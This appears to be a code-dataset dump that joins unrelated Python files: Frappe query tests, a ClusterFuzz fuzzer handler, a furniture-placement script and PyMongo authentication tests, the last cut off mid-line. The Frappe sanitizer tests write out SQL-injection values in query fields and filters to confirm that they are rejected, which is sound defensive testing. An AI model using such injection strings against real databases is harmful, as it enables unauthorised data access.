gt
stringclasses 1
value | context
stringlengths 2.49k
119k
|
|---|---|
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
from __future__ import unicode_literals
import frappe, unittest
from frappe.model.db_query import DatabaseQuery
from frappe.desk.reportview import get_filters_cond
from frappe.permissions import add_user_permission, clear_user_permissions_for_doctype
class TestReportview(unittest.TestCase):
def test_basic(self):
self.assertTrue({"name":"DocType"} in DatabaseQuery("DocType").execute(limit_page_length=None))
def test_fields(self):
self.assertTrue({"name":"DocType", "issingle":0} \
in DatabaseQuery("DocType").execute(fields=["name", "issingle"], limit_page_length=None))
def test_filters_1(self):
self.assertFalse({"name":"DocType"} \
in DatabaseQuery("DocType").execute(filters=[["DocType", "name", "like", "J%"]]))
def test_filters_2(self):
self.assertFalse({"name":"DocType"} \
in DatabaseQuery("DocType").execute(filters=[{"name": ["like", "J%"]}]))
def test_filters_3(self):
self.assertFalse({"name":"DocType"} \
in DatabaseQuery("DocType").execute(filters={"name": ["like", "J%"]}))
def test_filters_4(self):
self.assertTrue({"name":"DocField"} \
in DatabaseQuery("DocType").execute(filters={"name": "DocField"}))
def test_in_not_in_filters(self):
self.assertFalse(DatabaseQuery("DocType").execute(filters={"name": ["in", None]}))
self.assertTrue({"name":"DocType"} \
in DatabaseQuery("DocType").execute(filters={"name": ["not in", None]}))
for result in [{"name":"DocType"}, {"name":"DocField"}]:
self.assertTrue(result
in DatabaseQuery("DocType").execute(filters={"name": ["in", 'DocType,DocField']}))
for result in [{"name":"DocType"}, {"name":"DocField"}]:
self.assertFalse(result
in DatabaseQuery("DocType").execute(filters={"name": ["not in", 'DocType,DocField']}))
def test_or_filters(self):
data = DatabaseQuery("DocField").execute(
filters={"parent": "DocType"}, fields=["fieldname", "fieldtype"],
or_filters=[{"fieldtype":"Table"}, {"fieldtype":"Select"}])
self.assertTrue({"fieldtype":"Table", "fieldname":"fields"} in data)
self.assertTrue({"fieldtype":"Select", "fieldname":"document_type"} in data)
self.assertFalse({"fieldtype":"Check", "fieldname":"issingle"} in data)
def test_between_filters(self):
""" test case to check between filter for date fields """
frappe.db.sql("delete from tabEvent")
# create events to test the between operator filter
todays_event = create_event()
event1 = create_event(starts_on="2016-07-05 23:59:59")
event2 = create_event(starts_on="2016-07-06 00:00:00")
event3 = create_event(starts_on="2016-07-07 23:59:59")
event4 = create_event(starts_on="2016-07-08 00:00:01")
# if the values are not passed in filters then event should be filter as current datetime
data = DatabaseQuery("Event").execute(
filters={"starts_on": ["between", None]}, fields=["name"])
self.assertTrue({ "name": event1.name } not in data)
# if both from and to_date values are passed
data = DatabaseQuery("Event").execute(
filters={"starts_on": ["between", ["2016-07-06", "2016-07-07"]]},
fields=["name"])
self.assertTrue({ "name": event2.name } in data)
self.assertTrue({ "name": event3.name } in data)
self.assertTrue({ "name": event1.name } not in data)
self.assertTrue({ "name": event4.name } not in data)
# if only one value is passed in the filter
data = DatabaseQuery("Event").execute(
filters={"starts_on": ["between", ["2016-07-07"]]},
fields=["name"])
self.assertTrue({ "name": event3.name } in data)
self.assertTrue({ "name": event4.name } in data)
self.assertTrue({ "name": todays_event.name } in data)
self.assertTrue({ "name": event1.name } not in data)
self.assertTrue({ "name": event2.name } not in data)
def test_ignore_permissions_for_get_filters_cond(self):
frappe.set_user('test2@example.com')
self.assertRaises(frappe.PermissionError, get_filters_cond, 'DocType', dict(istable=1), [])
self.assertTrue(get_filters_cond('DocType', dict(istable=1), [], ignore_permissions=True))
frappe.set_user('Administrator')
def test_query_fields_sanitizer(self):
self.assertRaises(frappe.DataError, DatabaseQuery("DocType").execute,
fields=["name", "issingle, version()"], limit_start=0, limit_page_length=1)
self.assertRaises(frappe.DataError, DatabaseQuery("DocType").execute,
fields=["name", "issingle, IF(issingle=1, (select name from tabUser), count(name))"],
limit_start=0, limit_page_length=1)
self.assertRaises(frappe.DataError, DatabaseQuery("DocType").execute,
fields=["name", "issingle, (select count(*) from tabSessions)"],
limit_start=0, limit_page_length=1)
self.assertRaises(frappe.DataError, DatabaseQuery("DocType").execute,
fields=["name", "issingle, SELECT LOCATE('', `tabUser`.`user`) AS user;"],
limit_start=0, limit_page_length=1)
self.assertRaises(frappe.DataError, DatabaseQuery("DocType").execute,
fields=["name", "issingle, IF(issingle=1, (SELECT name from tabUser), count(*))"],
limit_start=0, limit_page_length=1)
self.assertRaises(frappe.DataError, DatabaseQuery("DocType").execute,
fields=["name", "issingle ''"],limit_start=0, limit_page_length=1)
self.assertRaises(frappe.DataError, DatabaseQuery("DocType").execute,
fields=["name", "issingle,'"],limit_start=0, limit_page_length=1)
data = DatabaseQuery("DocType").execute(fields=["name", "issingle", "count(name)"],
limit_start=0, limit_page_length=1)
self.assertTrue('count(name)' in data[0])
data = DatabaseQuery("DocType").execute(fields=["name", "issingle", "locate('', name) as _relevance"],
limit_start=0, limit_page_length=1)
self.assertTrue('_relevance' in data[0])
data = DatabaseQuery("DocType").execute(fields=["name", "issingle", "date(creation) as creation"],
limit_start=0, limit_page_length=1)
self.assertTrue('creation' in data[0])
data = DatabaseQuery("DocType").execute(fields=["name", "issingle",
"datediff(modified, creation) as date_diff"], limit_start=0, limit_page_length=1)
self.assertTrue('date_diff' in data[0])
def test_nested_permission(self):
clear_user_permissions_for_doctype("File")
delete_test_file_hierarchy() # delete already existing folders
from frappe.core.doctype.file.file import create_new_folder
frappe.set_user('Administrator')
create_new_folder('level1-A', 'Home')
create_new_folder('level2-A', 'Home/level1-A')
create_new_folder('level2-B', 'Home/level1-A')
create_new_folder('level3-A', 'Home/level1-A/level2-A')
create_new_folder('level1-B', 'Home')
create_new_folder('level2-A', 'Home/level1-B')
# user permission for only one root folder
add_user_permission('File', 'Home/level1-A', 'test2@example.com')
from frappe.core.page.permission_manager.permission_manager import update
update('File', 'All', 0, 'if_owner', 0) # to avoid if_owner filter
frappe.set_user('test2@example.com')
data = DatabaseQuery("File").execute()
# children of root folder (for which we added user permission) should be accessible
self.assertTrue({"name": "Home/level1-A/level2-A"} in data)
self.assertTrue({"name": "Home/level1-A/level2-B"} in data)
self.assertTrue({"name": "Home/level1-A/level2-A/level3-A"} in data)
# other folders should not be accessible
self.assertFalse({"name": "Home/level1-B"} in data)
self.assertFalse({"name": "Home/level1-B/level2-B"} in data)
update('File', 'All', 0, 'if_owner', 1)
frappe.set_user('Administrator')
def test_filter_sanitizer(self):
self.assertRaises(frappe.DataError, DatabaseQuery("DocType").execute,
fields=["name"], filters={'istable,': 1}, limit_start=0, limit_page_length=1)
self.assertRaises(frappe.DataError, DatabaseQuery("DocType").execute,
fields=["name"], filters={'editable_grid,': 1}, or_filters={'istable,': 1},
limit_start=0, limit_page_length=1)
self.assertRaises(frappe.DataError, DatabaseQuery("DocType").execute,
fields=["name"], filters={'editable_grid,': 1},
or_filters=[['DocType', 'istable,', '=', 1]],
limit_start=0, limit_page_length=1)
self.assertRaises(frappe.DataError, DatabaseQuery("DocType").execute,
fields=["name"], filters={'editable_grid,': 1},
or_filters=[['DocType', 'istable', '=', 1], ['DocType', 'beta and 1=1', '=', 0]],
limit_start=0, limit_page_length=1)
out = DatabaseQuery("DocType").execute(fields=["name"],
filters={'editable_grid': 1, 'module': 'Core'},
or_filters=[['DocType', 'istable', '=', 1]], order_by='creation')
self.assertTrue('DocField' in [d['name'] for d in out])
out = DatabaseQuery("DocType").execute(fields=["name"],
filters={'issingle': 1}, or_filters=[['DocType', 'module', '=', 'Core']],
order_by='creation')
self.assertTrue('User Permission for Page and Report' in [d['name'] for d in out])
out = DatabaseQuery("DocType").execute(fields=["name"],
filters={'track_changes': 1, 'module': 'Core'},
order_by='creation')
self.assertTrue('File' in [d['name'] for d in out])
out = DatabaseQuery("DocType").execute(fields=["name"],
filters=[
['DocType', 'ifnull(track_changes, 0)', '=', 0],
['DocType', 'module', '=', 'Core']
], order_by='creation')
self.assertTrue('DefaultValue' in [d['name'] for d in out])
def create_event(subject="_Test Event", starts_on=None):
""" create a test event """
from frappe.utils import get_datetime
event = frappe.get_doc({
"doctype": "Event",
"subject": subject,
"event_type": "Public",
"starts_on": get_datetime(starts_on),
}).insert(ignore_permissions=True)
return event
def delete_test_file_hierarchy():
files_to_delete = [
'Home/level1-A/level2-A/level3-A',
'Home/level1-A/level2-A',
'Home/level1-A/level2-B',
'Home/level1-A',
'Home/level1-B/level2-A',
'Home/level1-B'
]
for file_name in files_to_delete:
frappe.delete_doc('File', file_name)
|
|
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Manage fuzzers types."""
import datetime
import io
from flask import request
from google.cloud import ndb
from clusterfuzz._internal.base import utils
from clusterfuzz._internal.datastore import data_handler
from clusterfuzz._internal.datastore import data_types
from clusterfuzz._internal.fuzzing import fuzzer_selection
from clusterfuzz._internal.google_cloud_utils import storage
from clusterfuzz._internal.metrics import fuzzer_logs
from clusterfuzz._internal.system import archive
from handlers import base_handler
from libs import access
from libs import form
from libs import gcs
from libs import handler
from libs import helpers
ARCHIVE_READ_SIZE_LIMIT = 16 * 1024 * 1024
class Handler(base_handler.Handler):
"""Manages fuzzers."""
@handler.get(handler.HTML)
@handler.check_admin_access_if_oss_fuzz
@handler.check_user_access(need_privileged_access=False)
def get(self):
"""Handle a get request."""
fuzzer_logs_bucket = fuzzer_logs.get_bucket()
fuzzers = list(data_types.Fuzzer.query().order(data_types.Fuzzer.name))
jobs = data_handler.get_all_job_type_names()
corpora = [
bundle.name for bundle in data_types.DataBundle.query().order(
data_types.DataBundle.name)
]
privileged = access.has_access(need_privileged_access=True)
# Unprivileged users can't download fuzzers, so hide the download keys.
if not privileged:
for fuzzer in fuzzers:
fuzzer.blobstore_key = ''
template_values = {
'privileged': privileged,
'fuzzers': fuzzers,
'fuzzerLogsBucket': fuzzer_logs_bucket,
'fieldValues': {
'corpora': corpora,
'jobs': jobs,
'uploadInfo': gcs.prepare_blob_upload()._asdict(),
'csrfToken': form.generate_csrf_token(),
}
}
return self.render('fuzzers.html', template_values)
class BaseEditHandler(base_handler.GcsUploadHandler):
"""Base edit handler."""
def _read_to_bytesio(self, gcs_path):
"""Return a bytesio representing a GCS object."""
data = storage.read_data(gcs_path)
if not data:
raise helpers.EarlyExitException('Failed to read uploaded archive.', 500)
return io.BytesIO(data)
def _get_executable_path(self, upload_info):
"""Get executable path."""
executable_path = request.get('executable_path')
if not upload_info:
return executable_path
if upload_info.size > ARCHIVE_READ_SIZE_LIMIT:
return executable_path
if not executable_path:
executable_path = 'run' # Check for default.
reader = self._read_to_bytesio(upload_info.gcs_path)
return archive.get_first_file_matching(executable_path, reader,
upload_info.filename)
def _get_launcher_script(self, upload_info):
"""Get launcher script path."""
launcher_script = request.get('launcher_script')
if not upload_info:
return launcher_script
if not launcher_script:
return None
if upload_info.size > ARCHIVE_READ_SIZE_LIMIT:
return launcher_script
reader = self._read_to_bytesio(upload_info.gcs_path)
launcher_script = archive.get_first_file_matching(launcher_script, reader,
upload_info.filename)
if not launcher_script:
raise helpers.EarlyExitException(
'Specified launcher script was not found in archive!', 400)
return launcher_script
def _get_integer_value(self, key):
"""Check a numeric input value."""
value = request.get(key)
if value is None:
return None
try:
value = int(value)
except (ValueError, TypeError):
raise helpers.EarlyExitException(
'{key} must be an integer.'.format(key=key), 400)
if value <= 0:
raise helpers.EarlyExitException(
'{key} must be > 0.'.format(key=key), 400)
return value
def apply_fuzzer_changes(self, fuzzer, upload_info):
"""Apply changes to a fuzzer."""
if upload_info and not archive.is_archive(upload_info.filename):
raise helpers.EarlyExitException(
'Sorry, only zip, tgz, tar.gz, tbz, and tar.bz2 archives are '
'allowed!', 400)
if fuzzer.builtin:
executable_path = launcher_script = None
else:
executable_path = self._get_executable_path(upload_info)
launcher_script = self._get_launcher_script(upload_info)
# Executable path is required for non-builtin fuzzers and if it is not
# already set.
if not fuzzer.executable_path and not executable_path:
raise helpers.EarlyExitException(
'Please enter the path to the executable, or if the archive you '
'uploaded is less than 16MB, ensure that the executable file has '
'"run" in its name.', 400)
jobs = request.get('jobs', [])
timeout = self._get_integer_value('timeout')
max_testcases = self._get_integer_value('max_testcases')
external_contribution = request.get('external_contribution', False)
differential = request.get('differential', False)
environment_string = request.get('additional_environment_string')
data_bundle_name = request.get('data_bundle_name')
# Save the fuzzer file metadata.
if upload_info:
fuzzer.filename = upload_info.filename
fuzzer.blobstore_key = str(upload_info.key())
fuzzer.file_size = utils.get_size_string(upload_info.size)
fuzzer.jobs = jobs
fuzzer.revision = fuzzer.revision + 1
fuzzer.source = helpers.get_user_email()
fuzzer.timeout = timeout
fuzzer.max_testcases = max_testcases
fuzzer.result = None
fuzzer.sample_testcase = None
fuzzer.console_output = None
fuzzer.external_contribution = bool(external_contribution)
fuzzer.differential = bool(differential)
fuzzer.additional_environment_string = environment_string
fuzzer.timestamp = datetime.datetime.utcnow()
fuzzer.data_bundle_name = data_bundle_name
# Update only if a new archive is provided.
if executable_path:
fuzzer.executable_path = executable_path
# Optional. Also, update only if a new archive is provided and contains a
# launcher script.
if launcher_script:
fuzzer.launcher_script = launcher_script
fuzzer.put()
fuzzer_selection.update_mappings_for_fuzzer(fuzzer)
helpers.log('Uploaded fuzzer %s.' % fuzzer.name, helpers.MODIFY_OPERATION)
return self.redirect('/fuzzers')
class CreateHandler(BaseEditHandler):
"""Create a new fuzzer."""
@handler.post(handler.JSON, handler.JSON)
@handler.check_user_access(need_privileged_access=True)
@handler.require_csrf_token
def post(self):
"""Handle a post request."""
name = request.get('name')
if not name:
raise helpers.EarlyExitException('Please give the fuzzer a name!', 400)
if not data_types.Fuzzer.VALID_NAME_REGEX.match(name):
raise helpers.EarlyExitException(
'Fuzzer name can only contain letters, numbers, dashes and '
'underscores.', 400)
existing_fuzzer = data_types.Fuzzer.query(data_types.Fuzzer.name == name)
if existing_fuzzer.get():
raise helpers.EarlyExitException(
'Fuzzer already exists. Please use the EDIT button for changes.', 400)
upload_info = self.get_upload()
if not upload_info:
raise helpers.EarlyExitException('Need to upload an archive.', 400)
fuzzer = data_types.Fuzzer()
fuzzer.name = name
fuzzer.revision = 0
return self.apply_fuzzer_changes(fuzzer, upload_info)
class EditHandler(BaseEditHandler):
"""Edit or create a fuzzer."""
@handler.post(handler.JSON, handler.JSON)
@handler.check_user_access(need_privileged_access=True)
@handler.require_csrf_token
def post(self):
"""Handle a post request."""
key = helpers.get_integer_key(request)
fuzzer = ndb.Key(data_types.Fuzzer, key).get()
if not fuzzer:
raise helpers.EarlyExitException('Fuzzer not found.', 400)
upload_info = self.get_upload()
return self.apply_fuzzer_changes(fuzzer, upload_info)
class DeleteHandler(base_handler.Handler):
"""Delete a fuzzer."""
@handler.post(handler.JSON, handler.JSON)
@handler.check_user_access(need_privileged_access=True)
@handler.require_csrf_token
def post(self):
"""Handle a post request."""
key = helpers.get_integer_key(request)
fuzzer = ndb.Key(data_types.Fuzzer, key).get()
if not fuzzer:
raise helpers.EarlyExitException('Fuzzer not found.', 400)
fuzzer_selection.update_mappings_for_fuzzer(fuzzer, mappings=[])
fuzzer.key.delete()
helpers.log('Deleted fuzzer %s' % fuzzer.name, helpers.MODIFY_OPERATION)
return self.redirect('/fuzzers')
class LogHandler(base_handler.Handler):
"""Show the console output from a fuzzer run."""
@handler.check_user_access(need_privileged_access=False)
def get(self, fuzzer_name):
"""Handle a get request."""
helpers.log('LogHandler', fuzzer_name)
fuzzer = data_types.Fuzzer.query(
data_types.Fuzzer.name == fuzzer_name).get()
if not fuzzer:
raise helpers.EarlyExitException('Fuzzer not found.', 400)
return self.render('viewer.html', {
'title': 'Output for ' + fuzzer.name,
'content': fuzzer.console_output,
})
|
|
import furnitureList as fl
import random
import warnArea
import constants
from vector import *
def addPlacedFurniture(placedFurniture, furniture, warnAreas):
placedFurniture.append(furniture)
#Add a warn area for the furniture
warnArea.addWarnArea( warnAreas,
(
fl.getCorner1(furniture),
fl.getCorner2(furniture)
),
warnArea.getWarnLevelForFurniture(fl.getType(furniture))
)
def placeFurniture(placedFurniture, availableFurniture, warnAreas):
for i in warnAreas:
print(i)
freeSpace = fl.getFreeSpace(constants.WARNING_HARD, warnAreas)
print("Free space", freeSpace);
bruteForce(placedFurniture, availableFurniture, warnAreas)
def canPlaceCouch(span, warnAreas):
#Check the coordinates
if span[0].x == span[1].x:
if span[0].x == 500:
span[0].x = span[1].x = 0
else:
span[0].x = span[1].x = 500
for i in range(span[0].y, span[1].y + 1):
if warnArea.getWarnLevel(Vector2(span[0].x, i), warnAreas):
return False
else:
if span[0].y == 500:
span[0].y = span[1].y = 0
else:
span[0].y = span[1].y = 500
for i in range(span[0].x, span[1].x + 1):
if warnArea.getWarnLevel(Vector2(i, span[0].y), warnAreas):
return False
return True
def assessScore(furniture, warnAreas):
freeSpaces = fl.getFreeSpace(constants.WARNING_HARD, warnAreas)
if furniture == "bed":
return assessBedScore(freeSpaces)
# elif getType(furniture) == "couch":
# return assessCouchScore(freeSpaces)
elif furniture == "desk":
return assessDeskScore(freeSpaces)
# elif getType(furniture) == "chair":
# return assessChairScore(freeSpaces)
elif furniture == "tv":
return assessTVScore(freeSpaces, warnAreas)
elif furniture == "table":
return assessTableScore(freeSpaces)
# elif getType(furniture) == "rug":
# return assessRugScore(freeSpaces)
elif furniture == "shelf":
return assessShelfScore(freeSpaces)
# Functions for assesing the scores of different pieces of
# furniture. TODO THIS MIGHT NOT WORK WITH THE TV AND COUCH GROUP
#def assessBedScore(freeSpaces):
# spacesWithScore = []
# for space in freeSpaces:
# score = 100
# v1 = space[0]
# v2 = space[1]
# distance = get_distance(v1, v2)
# score *= 1/distance
# if space[0].y != ROOM_WIDTH: #if we are
#
# corner1 = space[0]
# corner2 = space[0].
# if isFree()
# score = 0
# spacesWithScore.append(space + [score])
#
# return spacesWithScore
def bruteForce(placedFurniture, availableFurniture, warnAreas):
print("avail is ", availableFurniture)
for furniture in availableFurniture:
if furniture == "chair":
continue
maxIt = 100 # maximum number of tests
numberOfItems = availableFurniture[furniture]
while maxIt and numberOfItems:
maxIt -= 1
numchairs = availableFurniture["chair"]
if furniture == "desk" and numchairs:
fW = constants.FURNITURE_SIZES[furniture][0] + constants.CHAIR_SIZE[0]
else:
fW = constants.FURNITURE_SIZES[furniture][0]
fH = constants.FURNITURE_SIZES[furniture][1]
randx = random.randint(0, constants.ROOM_WIDTH - fW)
randy = random.randint(0, constants.ROOM_WIDTH - fH)
v1 = Vector2(randx, randy)
v2 = Vector2(randx + fW, randy + fH)
if warnArea.isFree(v1, v2, warnAreas):
if furniture == "desk" and numchairs:
availableFurniture["chair"] -= 1
chairOffset = Vector2(0, constants.CHAIR_SIZE[0])
addPlacedFurniture(placedFurniture, \
createFurniture(v1 + chairOffset, v2 + chairOffset, "chair"), warnAreas)
numberOfItems -= 1
addPlacedFurniture(placedFurniture, \
createFurniture(v1, v2, furniture), warnAreas)
def createFurniture(vec1, vec2, type_):
return (vec1.x, vec1.y, vec2.x, vec2.y, type_)
# TODO probably not applicable
def assessCouchScore(freeSpaces):
pass
def assessDeskScore(freeSpaces):
pass
# TODO probably not applicable
def assessChairScore(freeSpaces):
pass
def assessTVScore(freeSpaces, warnAreas):
spacesWithScore = []
for space in freeSpaces:
score = 100
v1 = space[0]
v2 = space[1]
distance = get_distance(v1, v2)
if distance < constants.TV_SIZE[1]: # if the space does not fit tv...
spacesWithScore.append(space + [0]) # score is 0
continue
score *= 1/distance
if not canPlaceCouch(space, warnAreas):
score = 0
spacesWithScore.append(space + [score])
return spacesWithScore
# TODO probably not applicable
def assessTableScore(freeSpaces):
pass
# TODO probably not applicable
def assessRugScore(freeSpaces):
pass
def assessShelfScore(freeSpaces):
pass
def placeFurnitureInSpan(furnitureName, span, placedFurniture, warnAreas):
furnitureSize = constants.FURNITURE_SIZES[furnitureName];
print("Span: ", span);
width = furnitureSize[0]
height = furnitureSize[1];
pos0 = Vector2(0,0)
pos1 = Vector2(0,0)
#Calculating the direction of the furniture
if span[0].y == span[1].y:
middle = span[0].x + (span[1].x - span[0].x) / 2;
if(span[0].y == 0):
pos0.x = middle - width / 2;
pos0.y = span[0].y;
pos1.x = middle + width / 2;
pos1.y = span[0].y + height
else:
pos0.x = middle + width / 2;
pos0.y = span[0].y;
pos1.x = middle - width / 2;
pos1.y = span[0].y - height
else:
middle = span[0].y + (span[1].y - span[0].y) / 2;
if(span[0].x == 0):
pos0.x = span[0].x
pos0.y = middle + width / 2
pos1.x = span[0].x + height
pos1.y = middle - width / 2
else:
pos0.x = span[0].x
pos0.y = middle - width / 2
pos1.x = span[0].x - height
pos1.y = middle + width
addPlacedFurniture(placedFurniture, (pos0.x, pos0.y, pos1.x, pos1.y, furnitureName), warnAreas);
###################################################################
# Help functions
###################################################################
###################################################################
|
|
# Copyright 2013-2014 MongoDB, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Authentication Tests."""
import os
import sys
import threading
try:
from urllib.parse import quote_plus
except ImportError:
# Python 2
from urllib import quote_plus
sys.path[0:0] = [""]
from pymongo import MongoClient
from pymongo.auth import HAVE_KERBEROS, _build_credentials_tuple
from pymongo.errors import OperationFailure
from pymongo.read_preferences import ReadPreference
from test import client_context, host, port, SkipTest, unittest, Version
from test.utils import delay
# YOU MUST RUN KINIT BEFORE RUNNING GSSAPI TESTS.
GSSAPI_HOST = os.environ.get('GSSAPI_HOST')
GSSAPI_PORT = int(os.environ.get('GSSAPI_PORT', '27017'))
PRINCIPAL = os.environ.get('PRINCIPAL')
SASL_HOST = os.environ.get('SASL_HOST')
SASL_PORT = int(os.environ.get('SASL_PORT', '27017'))
SASL_USER = os.environ.get('SASL_USER')
SASL_PASS = os.environ.get('SASL_PASS')
SASL_DB = os.environ.get('SASL_DB', '$external')
class AutoAuthenticateThread(threading.Thread):
"""Used in testing threaded authentication.
This does collection.find_one() with a 1-second delay to ensure it must
check out and authenticate multiple sockets from the pool concurrently.
:Parameters:
`collection`: An auth-protected collection containing one document.
"""
def __init__(self, collection):
super(AutoAuthenticateThread, self).__init__()
self.collection = collection
self.success = False
def run(self):
assert self.collection.find_one({'$where': delay(1)}) is not None
self.success = True
class TestGSSAPI(unittest.TestCase):
@classmethod
def setUpClass(cls):
if not HAVE_KERBEROS:
raise SkipTest('Kerberos module not available.')
if not GSSAPI_HOST or not PRINCIPAL:
raise SkipTest('Must set GSSAPI_HOST and PRINCIPAL to test GSSAPI')
def test_credentials_hashing(self):
# GSSAPI credentials are properly hashed.
creds0 = _build_credentials_tuple(
'GSSAPI', '', 'user', 'pass', {})
creds1 = _build_credentials_tuple(
'GSSAPI', '', 'user', 'pass',
{'authmechanismproperties': {'SERVICE_NAME': 'A'}})
creds2 = _build_credentials_tuple(
'GSSAPI', '', 'user', 'pass',
{'authmechanismproperties': {'SERVICE_NAME': 'A'}})
creds3 = _build_credentials_tuple(
'GSSAPI', '', 'user', 'pass',
{'authmechanismproperties': {'SERVICE_NAME': 'B'}})
self.assertEqual(1, len(set([creds1, creds2])))
self.assertEqual(3, len(set([creds0, creds1, creds2, creds3])))
def test_gssapi_simple(self):
# Call authenticate() without authMechanismProperties.
client = MongoClient(GSSAPI_HOST, GSSAPI_PORT)
self.assertTrue(client.test.authenticate(PRINCIPAL,
mechanism='GSSAPI'))
client.test.collection.find_one()
# Log in using URI, without authMechanismProperties.
uri = ('mongodb://%s@%s:%d/?authMechanism='
'GSSAPI' % (quote_plus(PRINCIPAL), GSSAPI_HOST, GSSAPI_PORT))
client = MongoClient(uri)
client.test.collection.find_one()
# Call authenticate() with authMechanismProperties.
self.assertTrue(client.test.authenticate(
PRINCIPAL, mechanism='GSSAPI',
authMechanismProperties='SERVICE_NAME:mongodb'))
client.test.collection.find_one()
# Log in using URI, with authMechanismProperties.
uri = ('mongodb://%s@%s:%d/?authMechanism='
'GSSAPI;authMechanismProperties'
'=SERVICE_NAME:mongodb' % (quote_plus(PRINCIPAL),
GSSAPI_HOST, GSSAPI_PORT))
client = MongoClient(uri)
client.test.collection.find_one()
set_name = client.admin.command('ismaster').get('setName')
if set_name:
client = MongoClient(GSSAPI_HOST,
port=GSSAPI_PORT,
replicaSet=set_name)
# Without authMechanismProperties
self.assertTrue(client.test.authenticate(PRINCIPAL,
mechanism='GSSAPI'))
client.database_names()
uri = ('mongodb://%s@%s:%d/?authMechanism=GSSAPI;replicaSet'
'=%s' % (quote_plus(PRINCIPAL),
GSSAPI_HOST, GSSAPI_PORT, str(set_name)))
client = MongoClient(uri)
client.database_names()
# With authMechanismProperties
self.assertTrue(client.test.authenticate(
PRINCIPAL, mechanism='GSSAPI',
authMechanismProperties='SERVICE_NAME:mongodb'))
client.database_names()
uri = ('mongodb://%s@%s:%d/?authMechanism=GSSAPI;replicaSet'
'=%s;authMechanismProperties'
'=SERVICE_NAME:mongodb' % (quote_plus(PRINCIPAL),
GSSAPI_HOST,
GSSAPI_PORT,
str(set_name)))
client = MongoClient(uri)
client.database_names()
def test_gssapi_threaded(self):
client = MongoClient(GSSAPI_HOST)
self.assertTrue(client.test.authenticate(PRINCIPAL,
mechanism='GSSAPI'))
# Need one document in the collection. AutoAuthenticateThread does
# collection.find_one with a 1-second delay, forcing it to check out
# multiple sockets from the pool concurrently, proving that
# auto-authentication works with GSSAPI.
collection = client.test.collection
collection.drop()
collection.insert_one({'_id': 1})
threads = []
for _ in range(4):
threads.append(AutoAuthenticateThread(collection))
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertTrue(thread.success)
set_name = client.admin.command('ismaster').get('setName')
if set_name:
client = MongoClient(GSSAPI_HOST,
replicaSet=set_name,
readPreference='secondary')
self.assertTrue(client.test.authenticate(PRINCIPAL,
mechanism='GSSAPI'))
self.assertTrue(client.test.command('dbstats'))
threads = []
for _ in range(4):
threads.append(AutoAuthenticateThread(collection))
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertTrue(thread.success)
class TestSASLPlain(unittest.TestCase):
@classmethod
def setUpClass(cls):
if not SASL_HOST or not SASL_USER or not SASL_PASS:
raise SkipTest('Must set SASL_HOST, '
'SASL_USER, and SASL_PASS to test SASL')
def test_sasl_plain(self):
client = MongoClient(SASL_HOST, SASL_PORT)
self.assertTrue(client.ldap.authenticate(SASL_USER, SASL_PASS,
SASL_DB, 'PLAIN'))
client.ldap.test.find_one()
uri = ('mongodb://%s:%s@%s:%d/?authMechanism=PLAIN;'
'authSource=%s' % (quote_plus(SASL_USER),
quote_plus(SASL_PASS),
SASL_HOST, SASL_PORT, SASL_DB))
client = MongoClient(uri)
client.ldap.test.find_one()
set_name = client.admin.command('ismaster').get('setName')
if set_name:
client = MongoClient(SASL_HOST,
port=SASL_PORT,
replicaSet=set_name)
self.assertTrue(client.ldap.authenticate(SASL_USER, SASL_PASS,
SASL_DB, 'PLAIN'))
client.ldap.test.find_one()
uri = ('mongodb://%s:%s@%s:%d/?authMechanism=PLAIN;'
'authSource=%s;replicaSet=%s' % (quote_plus(SASL_USER),
quote_plus(SASL_PASS),
SASL_HOST, SASL_PORT,
SASL_DB, str(set_name)))
client = MongoClient(uri)
client.ldap.test.find_one()
def test_sasl_plain_bad_credentials(self):
client = MongoClient(SASL_HOST, SASL_PORT)
# Bad username
self.assertRaises(OperationFailure, client.ldap.authenticate,
'not-user', SASL_PASS, SASL_DB, 'PLAIN')
self.assertRaises(OperationFailure, client.ldap.test.find_one)
self.assertRaises(OperationFailure, client.ldap.test.insert_one,
{"failed": True})
# Bad password
self.assertRaises(OperationFailure, client.ldap.authenticate,
SASL_USER, 'not-pwd', SASL_DB, 'PLAIN')
self.assertRaises(OperationFailure, client.ldap.test.find_one)
self.assertRaises(OperationFailure, client.ldap.test.insert_one,
{"failed": True})
def auth_string(user, password):
uri = ('mongodb://%s:%s@%s:%d/?authMechanism=PLAIN;'
'authSource=%s' % (quote_plus(user),
quote_plus(password),
SASL_HOST, SASL_PORT, SASL_DB))
return uri
bad_user = MongoClient(auth_string('not-user', SASL_PASS))
bad_pwd = MongoClient(auth_string(SASL_USER, 'not-pwd'))
# OperationFailure raised upon connecting.
self.assertRaises(OperationFailure, bad_user.admin.command, 'ismaster')
self.assertRaises(OperationFailure, bad_pwd.admin.command, 'ismaster')
class TestSCRAMSHA1(unittest.TestCase):
@client_context.require_auth
@client_context.require_version_min(2, 7, 2)
def setUp(self):
self.replica_set_name = client_context.replica_set_name
# Before 2.7.7, SCRAM-SHA-1 had to be enabled from the command line.
if client_context.version < Version(2, 7, 7):
cmd_line = client_context.cmd_line
if 'SCRAM-SHA-1' not in cmd_line.get(
'parsed', {}).get('setParameter',
{}).get('authenticationMechanisms', ''):
raise SkipTest('SCRAM-SHA-1 mechanism not enabled')
client = client_context.rs_or_standalone_client
client.pymongo_test.add_user(
'user', 'pass',
roles=['userAdmin', 'readWrite'],
writeConcern={'w': client_context.w})
def test_scram_sha1(self):
client = MongoClient(host, port)
self.assertTrue(client.pymongo_test.authenticate(
'user', 'pass', mechanism='SCRAM-SHA-1'))
client.pymongo_test.command('dbstats')
client = MongoClient('mongodb://user:pass@%s:%d/pymongo_test'
